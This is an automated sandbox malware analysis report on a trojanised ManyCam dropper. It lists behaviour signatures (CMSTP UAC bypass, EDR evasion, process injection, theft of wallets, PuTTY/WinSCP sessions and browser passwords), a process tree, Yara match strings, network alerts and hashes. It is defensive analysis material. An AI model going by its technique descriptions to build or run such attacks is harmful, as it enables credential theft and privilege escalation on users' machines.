Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1537836
MD5:b55b503a690229f094ec6c9017145104
SHA1:1e0ffefdcff18410c5221c96ed17cc42d9d37f85
SHA256:a7cd1ac259dab063ac93ed0e9dc533bd90d1a2a26d8d0fbec0823bb073747b01
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Contain functionality to detect virtual machines
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4020 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B55B503A690229F094EC6C9017145104)
    • ManyCam.exe (PID: 5480 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)
      • pcaui.exe (PID: 332 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)
      • ManyCam.exe (PID: 5856 cmdline: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe MD5: BA699791249C311883BAA8CE3432703B)
        • pcaui.exe (PID: 3332 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)
        • cmd.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Rzu_channel_debug.exe (PID: 7224 cmdline: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • ManyCam.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)
    • pcaui.exe (PID: 7304 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)
    • cmd.exe (PID: 7328 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ManyCam.exe (PID: 7548 cmdline: "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)
    • pcaui.exe (PID: 7556 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)
    • cmd.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Rzu_channel_debug.exe (PID: 7776 cmdline: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000015.00000002.2464509110.0000000005666000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      0000000C.00000002.2154639347.00000000046B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000001.00000002.1717306561.0000000004BA9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            14.2.cmd.exe.2b207f8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              14.2.cmd.exe.2b207f8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x10f28:$s2: Elevation:Administrator!new:
              14.2.cmd.exe.29f4a08.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                14.2.cmd.exe.29f4a08.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x139f50:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x139f18:$s2: Elevation:Administrator!new:
                23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 29 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-19T19:53:58.549994+020020565501A Network Trojan was detected192.168.2.449741188.114.97.3443TCP
                  2024-10-19T19:54:36.337584+020020565501A Network Trojan was detected192.168.2.449946188.114.97.3443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: file.exeReversingLabs: Detection: 18%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Exploits

                  barindex
                  Source: Yara matchFile source: 14.2.cmd.exe.2b207f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.cmd.exe.29f4a08.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmd.exe.5629a00.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.cmd.exe.56b1acd.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.cmd.exe.566ca00.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.cmd.exe.4b11acd.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmd.exe.566eacd.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmd.exe.566f6cd.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.cmd.exe.4acca00.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.cmd.exe.56b26cd.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.cmd.exe.4b126cd.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000015.00000002.2464509110.0000000005666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2154639347.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1717306561.0000000004BA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1772936818.00000000046CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.2257486002.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.2656492685.0000000002701000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.2200232630.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.2199897817.0000000002B20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Rzu_channel_debug.exe PID: 7224, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49787 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49946 version: TLS 1.2
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: d:\branch_2.5\bin\cximagecrt.pdb0 source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: d:\branch_2.5\bin\cximagecrt.pdb source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8` source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatinerp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdb source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: ntdll.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.00020000.
                  Source: Binary string: wntdll.pdbUGP source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.000200
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831rp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe, 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1693524385.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdbu source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: c:\Program Files\OpenCV\bin\cv099.pdb source: ManyCam.exe, 00000001.00000003.1706528467.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716354265.00000000018AF000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 00000003.00000002.1771522596.0000000000BDF000.00000002.00000001.01000000.00000014.sdmp, ManyCam.exe, 0000000C.00000002.2148083400.000000000181F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: d:\branch_2.5\bin\ManyCam.pdb source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: d:\branch_2.5\Bin\CrashRpt.pdb source: ManyCam.exe, 00000001.00000003.1706209188.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716509296.0000000002012000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000003.00000002.1772302664.0000000002012000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: dbghelp.pdb source: ManyCam.exe, 00000001.00000002.1718820039.000000006D511000.00000020.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000003.00000002.1773936255.000000006D511000.00000020.00000001.01000000.00000016.sdmp, ManyCam.exe, 0000000C.00000002.2156061238.000000006D511000.00000020.00000001.01000000.00000016.sdmp, ManyCam.exe, 00000013.00000002.2258752567.000000006D511000.00000020.00000001.01000000.00000016.sdmp
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6BDDB0 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00007FF6EF6BDDB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D3000 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,0_2_00007FF6EF6D3000
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E4150 FindFirstFileExA,0_2_00007FF6EF6E4150
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,1_2_004164A0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,3_2_004164A0
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
